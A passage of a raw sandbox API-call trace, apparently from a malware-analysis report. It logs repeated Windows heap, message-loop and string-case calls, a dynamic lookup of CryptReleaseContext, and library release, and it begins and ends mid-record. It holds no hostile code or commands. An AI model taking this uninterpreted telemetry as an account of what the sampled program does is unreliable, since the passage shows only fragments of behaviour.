| out: lpMsg=0x8bf250) returned 0 [0189.338] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.338] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.338] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.338] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.339] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.339] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.339] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.339] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.339] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.339] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.339] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.339] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.339] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.339] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.339] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.339] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.339] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.339] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.339] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.341] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.341] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0189.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0189.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.343] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0189.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0189.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.344] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.346] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0189.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0189.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.347] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0189.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.348] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.348] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0189.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.348] FreeLibrary (hLibModule=0x74d40000) returned 1 [0189.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.350] CloseHandle (hObject=0x294) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: 